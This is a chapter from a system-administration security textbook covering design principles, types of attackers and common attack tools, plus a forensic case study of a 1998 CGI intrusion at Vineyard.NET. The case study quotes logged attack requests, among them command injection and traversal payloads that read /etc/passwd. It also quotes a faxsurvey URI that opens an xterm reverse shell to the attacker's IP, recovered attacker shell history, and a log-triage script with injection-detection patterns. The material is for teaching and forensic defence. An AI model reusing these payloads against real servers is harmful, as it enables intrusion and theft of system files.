Chapter 2. Security For Administrators
At a Glance
This chapter provides an operational definition of security for administrators, discusses the design of secure systems, and explains who attacks computer systems. Some typical attacker tools are enumerated, and a case study of an attack is developed.
Security for Administrators
As a technical administrator, you’re responsible for ensuring that the systems you manage do what they’re supposed to do. Although there are many formal definitions of security, a useful operational definition for administrators is:
A computer is secure if you can depend on it and its software to behave as you expect.
If you expect the data entered into your machine today to be there in a few weeks, and to remain unread by anyone who is not supposed to read it, then the machine is secure. Security, then, is a critical function of every administrator’s role. By this definition, natural disasters and buggy software are as much threats to security as unauthorized users are.
Bad Code
Designing secure computing systems and software isn’t easy. In 1975, Jerome Saltzer and M. D. Schroeder described seven criteria for building such systems. They are:
Least privilege
Every user and process should have the least set of access rights necessary. Least privilege limits the damage that can be done by malicious attackers and errors alike. Access rights should be explicitly required, rather than given to users by default.
Economy of mechanism
The design of the system should be small and simple so that it can be verified and correctly implemented.
Complete mediation
Every access should be checked for proper authorization.
Open design
Security should not depend upon the ignorance of the attacker. This criterion precludes back doors in the systems that give access to users who know about them.
Separation of privilege
Where possible, access to system resources should depend on more than one condition being satisfied.
Least common mechanism
Users should be isolated from one another by the system. This limits both covert monitoring and cooperative efforts to override system security mechanisms.
Psychological acceptability
The security controls must be easy to use so that they will be used and not bypassed.
Unfortunately, designers often never learn these criteria, forget them, take shortcuts, or decide they’re not important enough to bother with. As a result, there are many poorly-designed but widely-used operating systems, algorithms, and applications, including software that purports to be part of the security infrastructure of a system. Bad design leads to bugs and unforeseen side effects, which may cause accidental damage to your systems or information, or may be exploited intentionally by an attacker.
Free vs. Proprietary Software
One of the more controversial debates in software design is whether development processes that make source code freely available to users to inspect, modify, and redistribute (“free software” or “open source” software) should be preferred to proprietary (“closed source”) development on the basis of security.
On the one hand, freely available source code makes it easier for attackers to find exploitable bugs in a program by reading its source code. Because there are many common classes of program errors that lead to vulnerabilities, source code can sometimes even be submitted to automated analysis to turn up bugs. Bugs have certainly been found and exploited in open source software.
On the other hand, closed source is not a panacea. In many cases, programs can be reverse-engineered, or vulnerabilities can be spotted through “black box” testing of a program without the source code. Clearly, lack of availability of the source code for Microsoft’s Internet Information Server, for example, has not prevented attackers from exploiting several vulnerabilities, and this product seems to have a higher rate of exploits reported than, for example, the Apache web server.
Open source development can make it easier for program developers and users to spot and fix bugs before attackers find them. The OpenBSD operating system, which is free software, is widely acknowledged as one of the most secure operating systems currently available, in large part because its developers have audited every line of kernel source code for security. Other open source operating system kernels, including Linux, are not as heavily vetted and contain code from many developers. It is difficult to know the degree to which proprietary Unix operating systems such as Solaris have been audited for security.
Understanding Your Adversaries
Who is breaking into networked computers with the most sophisticated of attacks? It almost doesn’t matter—no matter who the attackers may be, they all need to be guarded against.
Script kiddies
As clichéd as it may sound, in many cases the attackers are children and teenagers—people who sadly have not (yet) developed the morals or sense of responsibility sufficient to keep their technical skills in check.
It is common to refer to young people who use sophisticated attack tools as script kiddies. The term is derisive. The word “script” implies that the attackers use readily available attack scripts that can be downloaded from the Internet to do their bidding, rather than creating their own attacks. And, of course, the attackers are called “kiddies” because so many of them turn out to be underage when they are apprehended.
Script kiddies should be considered a serious threat and feared for the same reason that teenagers with guns should be feared. In many cases, teenagers with handguns should be feared even more than adults, because a teenager is less likely to understand the consequences of his actions should he pull the trigger and thus more likely to pull it.
The same is true of script kiddies. In May 2001, for instance, Gibson Research Corporation was the subject of a devastating distributed denial-of-service attack that shut down its web site for more than 17 hours. The attack was orchestrated by more than 400 Windows computers around the Internet that had been compromised by an automated attack. As it turns out, Steve Gibson was able to get a copy of the attack program, reverse-engineer it, and trace it back. It turned out that his attacker was a 13-year-old girl.
Likewise, when authorities in Canada arrested “Mafiaboy” on April 19, 2000, for the February 2000 attacks on Yahoo, E*TRADE, CNN, and many other high-profile sites—attacks that caused more than $1.7 billion in damages—they couldn’t release the suspect’s name to the public because the 16-year-old was shielded by Canada’s laws protecting the privacy of minors.[208]
[208] http://news.cnet.com/news/0-1005-200-4523277.html
Script kiddies may not have the technical skills necessary to write their own attack scripts and Trojan horses, but it hardly matters. They have the tools and increasingly they show few reservations about using them. Either they do not understand the grave damage they cause, or they do not care.
What does a script kiddie do when he grows up? Nobody is really sure—to date, there are no reliable studies. Anecdotal reports suggest that many script kiddies go straight. Some lose interest in computers; some become system operators and network administrators; and some even go into the field of computer security. (The wisdom of hiring one of these individuals to watch over your network is a matter of debate within the computer security community.) But it is unquestionably clear that some individuals continue their lives of crime.
Industrial spies
There appears to be a growing black market for information stolen from computer systems. Some individuals have tried to ransom or extort the information from its rightful owners—for example, by offering to help a company close its vulnerabilities in exchange for a large cash payment. There have been several documented cases (and perhaps many more unreported) in which criminals have stolen credit card numbers of clients from a company’s server and threatened to post the information unless the company paid them. There have also been reports of attackers who have tried to sell industrial secrets to competitors of the companies that they have penetrated. Such transactions are illegal in the United States and in many other countries, but not in all.
Ideologues and national agents
There is a small but growing population of “hacktivists” who break into sites for ideological or political reasons. Often, the intent of these people is to deface web pages to make a statement of some kind; examples include the defacement of law enforcement agencies’ sites, the destruction of web sites by environmental groups, and the destruction of research computing sites involved in animal studies. Sometimes the protesters are making a political statement; they may be advancing an ideological cause, or they may merely be anarchists striking a blow against technology or business.
Sometimes, these incidents may be carried out against national interests. For instance, a guerilla movement may deface sites belonging to a government opponent. In other cases, you see individuals in one jurisdiction attempting to make some point by attacking sites in another, such as in the Israeli-Palestinian conflict, the ongoing tension between Pakistan and India, and the aftermath of the accidental bombing of the Chinese embassy by U.S. forces. Many of these attacks may be spontaneous, but some may be coordinated or financed by the governments themselves.
These incidents can also affect third parties. For instance, during a Chinese crackdown, many ISPs around the world hosting web pages of adherents of Falun Gong found their servers under attack from sites inside China. Because of the coordination and replication of the attacks, authorities believed they were actually state-sponsored. ISPs have been attacked by vigilantes because they sell service to spammers, provide web service for hate groups, or seem to be associated with child pornographers—even if the ISP owners and operators were unaware of these activities!
Organized crime
Vast amounts of valuable information and financial data flow through the Internet. It would be naive to believe that the criminal element is unaware of this, or is uninterested in expanding into the networked world. There have been incidents of fraud, information piracy, and money laundering conducted online that officials believe are all related to organized crime. Communications on the Net have been used to advance and coordinate prostitution and pornography, gambling, trafficking in illegal substances, gun running, and other activities commonly involving organized crime. Furthermore, law enforcement sites may be targeted by criminals to discover what is known about them, or to discover identities of informants and witnesses.
With network globalization, the threats have a longer reach. The Russian mob, Sicilian Mafia, Japanese Yakuza, South American drug families, and Los Angeles gangs (to name a few) are all a few mouse clicks away on the network. Many law enforcement officials worry as a result that the Internet is a “growth” area for crime in the coming decade.
Rogue employees and insurance fraud
Finally, there are many cases of technically skilled employees who have turned against their employers out of revenge, malice, or boredom. In some cases, terminated employees have planted Trojan horses or logic bombs in their employer’s computers. In other cases, computer systems have been destroyed by employees as part of insurance scams.
What the Attacker Wants
Compromising a computer system is usually not an end in itself. Instead, most attackers seek to use compromised systems as a stepping-stone for further attacks and vandalism. After an attacker compromises a system, the system can be used for many nefarious purposes, including:
• Launching probes or exploits against other systems
• Participating in distributed denial-of-service (DDOS) attacks
• Running covert servers (e.g., the attacker might set up an Internet Relay Chat server that will act as a rendezvous point for Trojan horses and viruses that are sending back captured data)
• Covertly monitoring the network of the organization that owns the compromised system, with the goal of compromising more systems
• Becoming a repository for attack tools, pirated software, pornography, or other kinds of contraband information
There are many reasons that compromised systems make excellent platforms for these kinds of illegal activities. If a compromised system is connected to a high-speed Internet connection, the system may be able to do much more damage and mayhem than other systems that the attacker controls. Compromised systems can also be used to make it more difficult for authorities to trace an attacker’s actions back to the person behind the keyboard. If an attacker hops through many computers in different jurisdictions—for example, from a compromised Unix account in France to a Windows proxy server in South Korea to an academic computer center in Mexico to a backbone router in New York—it may be effectively impossible to trace the attacker backward to the source.
Tools of the Attacker’s Trade
A smattering of tools that have been commonly used by attackers would include:
nc (a.k.a. netcat)
Originally written by “Hobbit,” netcat is the Swiss Army knife for IP-based networks. As such, it is a valuable diagnostic and administrative tool as well as useful to attackers. You can use netcat to send arbitrary data to arbitrary TCP/IP ports on remote computers, to set up local TCP/IP servers, and to perform rudimentary port scans.
trinoo (a.k.a. trin00)
trinoo is a denial-of-service attack server: it waits for a message from a remote system and, upon receiving the message, launches a denial-of-service attack against a third party. Versions of trinoo are available for most Unix operating systems, including Solaris and Red Hat Linux. The presence of trinoo is usually hidden. A detailed analysis of trinoo can be found at http://staff.washington.edu/dittrich/misc/trinoo.analysis.
Back Orifice and Netbus
These Windows-based programs are Trojan horses that allow an attacker to remotely monitor keystrokes, access files, upload and download programs, and run programs on compromised systems.
bots
Short for robots, bots are small programs that are typically planted by an attacker on a collection of computers scattered around the Internet. Bots are one of the primary tools for conducting distributed denial-of-service attacks and for maintaining control on Internet Relay Chat channels. Bots can be distributed by viruses or Trojan horses. They can remain dormant for days, weeks, or years until they are activated. Bots can even engage in autonomous actions.
root kits
A root kit is a program or collection of programs that simultaneously gives the attacker superuser privileges on a computer, plants back doors on the computer, and erases any trace that the attacker has been present. Originally, root kits were designed for Unix systems (hence the name “root”), but root kits have been developed for Windows systems as well. A typical root kit might attempt a dozen or so different exploits to obtain superuser privileges. Once superuser privileges are achieved, the root kit might patch the login program to add a back door, then modify the computer’s kernel so that any attempt to read the login program returns the original, unmodified program, rather than the modified one. Commands might be modified so that network connections from the attacker’s machine are not displayed. Finally, the root kit might then erase the last five minutes of the computer’s log files.
Worms
Worms exploiting vulnerabilities in network servers or networking components of operating systems have become a common way to compromise large numbers of computers at once.
Case Study: Faxsurvey
On October 7, 1998, an employee at Vineyard.NET noticed that the user http was logged in to the company’s primary web server:
Script started on Wed Oct 7 20:54:21 1998
bash-2.02# w
 8:57PM  up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35
USER     TTY  FROM              LOGIN@   IDLE  WHAT
http     p0   KRLDB110-06.spli  Tue02AM  1days /bin/sh
simsong  p1   asy12.vineyard.n  8:42PM   15    -tcsh (tcsh)
ericx    p2   mac-ewb.vineyard  8:46PM   0     script
ericx    p3   mac-ewb.vineyard  8:46PM   11    top
ericx    p4   mac-ewb.vineyard  8:53PM   1     sleep 5
bash-2.02#
This computer was running the BSDI v3.1 operating system with all patches as released by the vendor. The web server was a version of the Apache web server named Stronghold. The computer was used to initiate Automated Clearing House electronic funds transfers from customer accounts. To assist in these funds transfers, the computer held credit card and bank account information. (Fortunately, that information was stored on the computer in an encrypted format.)
In all likelihood, a user logged in as http could be the result of two things. First, it could be a member of the ISP’s staff who was using the http account for debugging. Alternatively, it could be an attacker who had found some way to break into the http account, but had been unable to gain additional access. Because the user http was logged in from a computer whose name began KRLDB110-06.spli, it appeared to the staff that this was a case of unauthorized access.
When the intrusion was discovered, one of the staff members immediately started the Unix program script to record his actions. The intruder appeared to be idle for more than a day. The original intrusion had taken place on Tuesday at 2:00 a.m.
The next step was to list all of the processes currently running on the computer. Two processes were out of place — they were two copies of the /bin/sh shell that were being run by http. Both of those shells had been started on the previous day, one at 2:00 a.m., the other at 4:00 a.m.:
bash-2.02# ps auxww
USER    PID %CPU %MEM  VSZ   RSS  TT  STAT STARTED    TIME COMMAND
root  11766  3.0  0.0    0     0  ??  Z    23Sep98 0:00.00 (admin_server)
root   3763  1.0  0.0    0     0  ??  Z     2:03PM 0:00.00 (junkbuster)
mail  18120  1.3  0.3  816   724  ??  S     8:56PM 0:00.64 smap
root  17573  1.0  0.0    0     0  ??  Z    11:03AM 0:00.00 (admin_server)
root     16  0.0  0.0   68    64  ??  Is   10Sep98 0:00.00 asyncd 2
root     18  0.0  0.0   68    64  ??  Is   10Sep98 0:00.02 asyncd 2
root     28  0.0  8.0  748 20680  ??  Ss   10Sep98 0:16.32 mfs -o rw -s 40960 /dev/sd0b /tmp (mount_mfs)
root     53  0.0  0.1  268   296  ??  Ss   10Sep98 0:38.23 gettyd -s
root  18670  0.0  0.5  560  1276  ??  S    Tue02AM 0:04.77 (xterm)
http  18671  0.0  0.1  244   276  p0  Is   Tue02AM 0:02.23 /bin/sh
http  26225  0.0  0.1  236   276  p0  I+   Tue04AM 0:00.07 /bin/sh
Apparently, the intruder had broken in and then, for some reason, had given up. As there appeared to be no immediate urgency, the ISP carefully formulated a plan of action:
1. Do not alert the intruder about what is happening.
2. Determine the intruder’s source IP address.
3. Use the Unix kill command to STOP the intruder’s processes. This signal would prevent the processes from running while leaving a copy in memory.
4. Make a copy of the intruder’s processes using the Unix gcore command.
5. Place a rule on the ISP router to block packets from the intruder’s ISP.
6. Kill the intruder’s processes unequivocally with kill -9.
7. Determine how the intruder had broken in and fix the hole.
8. Alert law enforcement.
To trace the intruder, the ISP tried using the netstat command. This turned up a new piece of information. The intruder had not broken in with Telnet or SSH; instead, there was an X11 connection from the web server (Apache.Vineyard.NET) to an X server running on the intruder’s computer:
bash-2.02# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address            Foreign Address          (state)
tcp        0      0  VINEYARD.NET.http        nhv-ct4-09.ix.ne.1137    SYN_RCVD
tcp        0      0  VINEYARD.NET.http        nhv-ct4-09.ix.ne.1136    SYN_RCVD
tcp        0      0  VINEYARD.NET.http        nhv-ct4-09.ix.ne.1135    SYN_RCVD
tcp        0      0  VINEYARD.NET.http        DSY27.VINEYARD.N.1079    SYN_RCVD
tcp        0   2456  VINEYARD.NET.http        nhv-ct4-09.ix.ne.1134    ESTABLISHED
tcp        0   2268  VINEYARD.NET.http        DSY27.VINEYARD.N.1078    ESTABLISHED
tcp        0   2522  VINEYARD.NET.http        209.174.140.26.1205      ESTABLISHED
tcp        0   8192  VINEYARD.NET.http        host-209-214-118.1785    ESTABLISHED
tcp        0   4916  VINEYARD.NET.http        host-209-214-118.1784    ESTABLISHED
tcp        0      0  VINEYARD.NET.http        host-209-214-118.1783    ESTABLISHED
tcp        0      0  VINEYARD.NET.http        ASY14.VINEYARD.N.1163    FIN_WAIT_2
tcp        0      0  LOCALHOST.VINEYA.sendm   LOCALHOST.VINEYA.1135    ESTABLISHED
tcp        0      0  LOCALHOST.VINEYA.1135    LOCALHOST.VINEYA.sendm   ESTABLISHED
tcp        0      0  VINEYARD.NET.smtp        208.135.218.34.1479      ESTABLISHED
tcp        0   3157  VINEYARD.NET.pop         ASY5.VINEYARD.NE.1027    ESTABLISHED
tcp        0      0  APACHE.VINEYARD..ssh     MAC-EWB.VINEYARD.2050    ESTABLISHED
tcp        0      0  VINEYARD.NET.http        host-209-214-118.1782    FIN_WAIT_2
tcp        0      0  VINEYARD.NET.http        host-209-214-118.1781    FIN_WAIT_2
tcp        0      0  VINEYARD.NET.http        host-209-214-118.1775    FIN_WAIT_2
tcp        0      0  VINEYARD.NET.http        56k-2234.hey.net.1099    FIN_WAIT_2
tcp        0      0  VINEYARD.NET.https       ESY8.VINEYARD.NE.1557    FIN_WAIT_2
tcp        0      0  LOCALHOST.VINEYA.sendm   LOCALHOST.VINEYA.1058    ESTABLISHED
tcp        0      0  LOCALHOST.VINEYA.1058    LOCALHOST.VINEYA.sendm   ESTABLISHED
tcp        0      0  APACHE.VINEYARD..smtp    m28.boston.juno..54519   ESTABLISHED
tcp        0      0  APACHE.VINEYARD..ssh     MAC-EWB.VINEYARD.nfs     ESTABLISHED
tcp        0    328  APACHE.VINEYARD..ssh     MAC-EWB.VINEYARD.2048    ESTABLISHED
tcp        0      0  VINEYARD.NET.http        ASY14.VINEYARD.N.1162    FIN_WAIT_2
tcp        0      0  VINEYARD.NET.http        ASY14.VINEYARD.N.1160    FIN_WAIT_2
tcp        0      0  NEXT.VINEYARD.NE.ssh     ASY12.VINEYARD.N.1047    ESTABLISHED
tcp        0   7300  VINEYARD.NET.pop         DSY27.VINEYARD.N.1061    ESTABLISHED
tcp        0      0  NEXT.VINEYARD.NE.imap2   ASY12.VINEYARD.N.1041    ESTABLISHED
tcp        0      0  VINEYARD.NET.3290        VINEYARD.NET.imap2       CLOSE_WAIT
tcp        0      0  VINEYARD.NET.ssh         simsong.ne.media.1017    ESTABLISHED
tcp        0      0  APACHE.VINEYARD..3098    KRLDB110-06.spli.X11     ESTABLISHED
tcp     8760      0  VINEYARD.NET.1022        BACKUP.VINEYARD..ssh     ESTABLISHED
tcp        0      0  LOCALHOST.VINEYA.4778    *.*                      LISTEN
tcp        0      0  LOCALHOST.VINEYA.domai   *.*                      LISTEN
tcp        0      0  NET10.VINEYARD.N.domai   *.*                      LISTEN
tcp        0      0  SMTP4.VINEYARD.N.domai   *.*                      LISTEN
The ISP concluded that the attacker had used a vulnerability in a CGI script to spawn an xterm back to his remote machine. To test this hypothesis, the ISP did a quick search through its web server logs:
% grep -I krldb110-06 /vni/apache/log/access_log
1. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
2. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
3. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/viewsource?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
4. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:53 -0400] "GET /cgi-bin/htmlscript?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
5. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] "GET /cgi-bin/campas?%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
6. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:55 -0400] "GET /cgi-bin/handler/useless_shit;ls%20-lFa|?data=Download HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
7. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
8. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
9. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] "GET /cgi-bin/faxsurvey?uname%20-a HTTP/1.1" 200 461 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
10. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
11. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
12. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/ HTTP/1.1" 200 1701 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
13. krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
14. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] "GET /cgi-bin/faxsurvey?pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
15. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] "GET /cgi-bin/faxsurvey?/bin/pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/ HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
Notice that lines 1–7 each occur within a few seconds of one another. It appears that the attacker was using an automated tool that checks for CGI vulnerabilities. In lines 8–17 the attacker exploits a vulnerability in the faxsurvey script. This was almost certainly done with a different tool; one indication is that the version of the HTTP protocol the client reports changes from “HTTP/1.0” to “HTTP/1.1”.
The web server log file revealed that the full hostname of the attacker was krldb110-06.splitrock.net. Using the host command, this address could be translated into an actual IP address:
apache: {43} % host krldb110-06.splitrock.net
krldb110-06.splitrock.net has address 209.156.113.121
apache: {44} %
By inspecting the log file, it appears that the script /cgi-bin/faxsurvey has a bug that allows the attacker to execute arbitrary commands. (Otherwise, why else would the attacker keep sending URLs calling the same script with different arguments?) If this is true, then the following commands must have been executed by the attacker:
ls -lFa
ls -lFa
uname -a
id
cat /etc/passwd
ls -lFa /usr/
id
pwd
/bin/pwd
ls -lFa
ls -lFa ../conf/
It is not clear from the log files how the attacker was able to go from executing these commands to executing the xterm command. But it is very clear that the xterm command was executed, as evidenced by the http entry in the output of the w command, the running (xterm) process, and the X11 entry in the netstat output.
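The log triage just described can be automated. The following script is an added example, not code from the book or from Vineyard.NET: it parses Apache combined-format lines like those quoted above, flags a client that fires several CGI probes within a few seconds (the scanner pattern of lines 1–7), decodes the arguments of successful faxsurvey requests into the commands the server ran, and decodes the REQUEST_URI later recovered from process memory. The sample log is constructed from entries quoted in the chapter; the thresholds `window` and `min_hits` are assumptions.

```python
"""Forensic triage for the faxsurvey case study (added example, not the
book's or Vineyard.NET's own code).  The sample log below is constructed from
entries quoted in the chapter, trimmed to the fields the analysis needs."""
import re
import urllib.parse
from collections import defaultdict
from datetime import datetime

# Apache combined log format, up to the status and size fields.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# A decoded CGI argument containing whitespace (a command with options, or a
# %0a newline), shell metacharacters, traversal or /etc/ is treated as a probe.
INJECTION_RE = re.compile(r'[\s;|`]|\.\./|/etc/')

# Constructed sample: six attacker lines from the chapter plus one benign hit.
SAMPLE_LOG = """\
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0"
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0"
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/viewsource?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0"
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] "GET /cgi-bin/faxsurvey?uname%20-a HTTP/1.1" 200 461 "-" "Mozilla/4.0"
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467 "-" "Mozilla/4.0"
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/ HTTP/1.1" 200 305 "-" "Mozilla/4.0"
asy12.vineyard.net - - [06/Oct/1998:02:53:49 -0400] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
"""

# REQUEST_URI as recovered from the process memory image quoted in the chapter.
XTERM_REQUEST_URI = ("/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20"
                     "209.156.113.121:0.0%20-rv%20-e%20/bin/sh")


def decode_request(uri):
    """Split a request URI into the script path and its URL-decoded argument."""
    path, _, query = uri.partition("?")
    return path, urllib.parse.unquote(query)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, arg = decode_request(m.group("uri"))
    return {
        "host": m.group("host"),
        "time": datetime.strptime(m.group("time"), TIME_FMT),
        "path": path,
        "arg": arg,
        "proto": m.group("proto"),
        "status": int(m.group("status")),
    }


def parse_log(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def is_probe(rec):
    """A /cgi-bin/ request whose decoded argument looks like command injection."""
    return rec["path"].startswith("/cgi-bin/") and bool(INJECTION_RE.search(rec["arg"]))


def probe_bursts(records, window=10, min_hits=3):
    """Map each host to the largest number of probes it sent inside any
    `window`-second span, keeping only hosts that reached `min_hits`.
    A tight cluster of probes against different scripts is the scanner signature."""
    times_by_host = defaultdict(list)
    for rec in records:
        if is_probe(rec):
            times_by_host[rec["host"]].append(rec["time"])
    bursts = {}
    for host, times in times_by_host.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_hits:
            bursts[host] = best
    return bursts


def executed_commands(records, script="/cgi-bin/faxsurvey"):
    """Decoded arguments of successful (200) calls to a script that passes its
    argument to the shell: the commands the web server actually ran."""
    return [r["arg"] for r in records if r["path"] == script and r["status"] == 200]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("CGI scanner bursts:", probe_bursts(recs))
    for cmd in executed_commands(recs):
        print("ran via faxsurvey:", cmd)
    print("memory-image REQUEST_URI decodes to:", decode_request(XTERM_REQUEST_URI))
```

Widening `window` to 60 seconds also catches the slower hand-driven faxsurvey requests from the same host, which is the trade-off between catching scanners and flagging ordinary CGI traffic.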
At this point, the ISP searched for the attacker’s hostname in other log files. A suspicious result was found in the messages log file — apparently the attacker had attempted to exploit a POP or qpopper bug:
apache: {15} % grep -i krldb110-06 *
messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06.splitrock.net: -ERR POP timeout
To preserve the record of the attacker’s processes, they were stopped, an image of the process memory was saved, and then the processes were killed.
Following this, a rule was added to the ISP’s routers to block access from the attacker’s IP addresses. Permissions on the faxsurvey script were changed to prevent any access, pending an investigation. A few days later, the script was removed from the web server.
The attacked ISP contacted SplitRock Services, Inc., the ISP that was responsible for the IP address. It was determined that SplitRock operated several modem pools that were provided to another ISP (Prodigy) on a leasing arrangement. SplitRock was asked to preserve its logfiles so that they could be used in a future legal investigation.
By using the Unix strings command over the process memory image files, it was possible to extract significantly more information about the attacker. One group of strings was from the shell history that was, effectively, a list of the commands that the attacker had typed. The attacker appeared to have downloaded a rootkit, and also to have attempted to get a buffer overflow attack to work properly against the system’s IMAP server:
-lFa gcc -o s s.c
st2.c ftp 209.156.113.121
cron.c gcc -o s st2.c
cxterm.c ./s console
x2.c t .s
qpush.c .121
cat t.c qpush.c
cat .c ppp.c
cat s.c t2.c
gc c cron.c
ls –lFa cxterm.c
./s -v c2 tcsh
./s p0 x2.c
ls -lFa / README
cat .s README.debian
ls –lFa qpush
cat /w qpush.c
ls -lFa / qpush.c.old
cat .s Gf: not found
_=.s /tmp
$ : not found mfs:28
gcc -o s steal.c /bin/sh
ls -lFa *.c
/bin/sh
/bin/sh
/etc/inetd.conf
qpush.c
/usr/bin/gcc
n/gcc
./cc
Expr
Done
/bin/sh
inetd.conf
t) | telnet 127.1 143
cd /etc
cat .s
which pwd
ls –lFa
expr $L + 1
ls –lFa
./cc –10
./cc
The second kind of strings found in the memory images corresponded to shell environment variables. Many of these were variables that would be set for a process spawned from a CGI script — confirming that the shell was, in fact, the result of a CGI attack. This block confirmed that the CGI script responsible for the intrusion was the faxsurvey script.
GATEWAY_INTERFACE=CGI/1.1
REMOTE_HOST=krldb110-06.splitrock.net
MACHTYPE=i386-pc-bsdi3.1
HOSTNAME=apache.vineyard.net
L=100
SHLVL=1
REMOTE_ADDR=209.156.113.121
QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
DOCUMENT_ROOT=/htdocs/biz/captiva
REMOTE_PORT=4801
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
HTTP_HOST=www.captivacruises.com
LOGNAME=http
WINDOWID=8388621
_=/bins
REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002
TERM=xterm
HTTP_CONNECTION=Keep-Alive
PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin
HTTP_ACCEPT_LANGUAGE=en-us
DISPLAY=209.156.113.121:0.0
SERVER_PROTOCOL=HTTP/1.1
